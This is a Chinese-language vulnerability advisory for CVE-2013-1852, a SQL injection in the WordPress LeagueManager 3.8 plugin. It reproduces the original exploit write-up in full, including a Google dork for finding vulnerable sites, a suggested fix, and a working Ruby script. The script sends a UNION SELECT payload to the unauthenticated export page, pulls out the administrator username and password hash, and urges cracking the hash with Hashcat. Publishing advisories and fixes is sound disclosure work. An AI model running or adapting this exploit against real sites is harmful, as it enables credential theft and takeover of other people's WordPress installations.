WordPress LeagueManager插件'league

发布日期:2013-03-13
更新日期:2013-03-19

受影响系统:
WordPress LeagueManager 3.8
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 58503
 CVE(CAN) ID: CVE-2013-1852
 
WordPress LeagueManager是管理和显示Sports Leagues的插件。
 
LeagueManager 3.8及其他版本在leaguemanager_export页面内的'league_id'参数的实现上存在SQL注入漏洞,利用此漏洞可允许攻击者执行未授权数据库操作。
 
<*来源:Joshua Reynolds
 
  链接:
 *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/ruby
 #
 # Exploit Title: WordPress LeagueManager Plugin v3.8 SQL Injection
 # Google Dork: inurl:"/wp-content/plugins/leaguemanager/"
 # Date: 13/03/13
 # Exploit Author: Joshua Reynolds
 # Vendor Homepage:
 # Software Link:
 # Version: 3.8
 # Tested on: BT5R1 - Ubuntu 10.04.2 LTS
 # CVE: CVE-2013-1852
 #-----------------------------------------------------------------------------------------
 #Description:
 #
 #An SQL Injection vulnerability exists in the league_id parameter of a function call made
 #by the leaguemanager_export page. This request is processed within the leaguemanager.php:
 #
 #if ( isset($_POST['leaguemanager_export']))
 #              $lmLoader->adminPanel->export($_POST['league_id'], $_POST['mode']);
 #
 #Which does not sanitize of SQL injection, and is passed to the admin/admin.php page
 #into the export( $league_id, $mode ) function which also does not sanitize for SQL injection
 #when making this call: $this->league = $leaguemanager->getLeague($league_id);
 #The information is then echoed to a CSV file that is then provided.
 #
 #Since no authentication is required when making a POST request to this page,
 #i.e /wp-admin/admin.php?page=leaguemanager-export the request can be made with no established
 #session.
 #
 #Fix:
 #
 #A possible fix for this would be to cast the league_id to an integer during any
 #of the function calls. The following changes can be made in the leaguemanager.php file:
 #$lmLoader->adminPanel->export((int)$_POST['league_id'], $_POST['mode']);
 #
 #These functions should also not be available to public requests, and thus session handling
 #should also be checked prior to the requests being processed within the admin section.
 #
 #The responsible disclosure processes were distorted by the fact that the author no longer
 #supports his well established plugin, and there are currently no maintainers. After
 #e-mailing the folks over at plugins@wordpress.org they've decided to discontinue the plugin
 #and not patch the vulnerability.
 #
 #The following ruby exploit will retrieve the administrator username and the salted
 #password hash from a given site with the plugin installed:
 #------------------------------------------------------------------------------------------
 #Exploit:

require 'net/http'
 require 'uri'

if ARGV.length == 2
    post_params = {
        'league_id' => '7 UNION SELECT ALL user_login,2,3,4,5,6,7,8,'\
        '9,10,11,12,13,user_pass,15,16,17,18,19,20,21,22,23,24 from wp_users--',
        'mode' => 'teams',
        'leaguemanager_export' => 'Download+File'
    }

target_url = ARGV[0] + ARGV[1] + "/wp-admin/admin.php?page=leaguemanager-export"
     
    begin
        resp = Net::HTTP.post_form(URI.parse(target_url), post_params)
    rescue
        puts "Invalid URL..."
    end
         
    if resp.nil?
        print_error "No response received..."

elsif resp.code != "200"
        puts "Page doesn't exist!"
    else 
        admin_login = resp.body.scan(/21\t(.*)\t2.*0\t(.*)\t15/)
     
        if(admin_login.length > 0)
            puts "Username: #{admin_login[0][0]}"
            puts "Hash: #{admin_login[0][1]}"
            puts "\nNow go crack that with Hashcat :)"
        else
            puts "Username and hash not received. Maybe it's patched?"
        end
    end
 else
    puts "Usage: ruby LeagueManagerSQLI.rb \"http://example.com\" \"/wordpress\""
 end

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://127.0.0.1/wyyswp.html